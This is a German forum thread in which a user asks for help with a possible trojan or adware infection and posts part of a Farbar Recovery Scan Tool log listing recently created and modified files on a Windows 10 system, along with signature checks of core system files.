2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-22 18:36 - 2017-03-20 06:41 - 00908736 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-22 18:36 - 2017-03-20 06:41 - 00192916 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-22 18:34 - 2017-03-18 13:40 - 00065536 _____ C:\WINDOWS\system32\config\ELAM
2017-05-22 18:34 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-22 18:29 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-22 18:29 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-22 18:28 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-22 18:28 - 2017-02-05 21:38 - 00015703 _____ C:\bdlog.txt
2017-05-22 18:20 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-22 18:14 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-22 17:52 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-21 21:36 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-20 14:33 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group                                               ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-19 15:19

==================== Ende von FRST.txt ============================
         

Alt 22.05.2017, 18:39   #13
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017
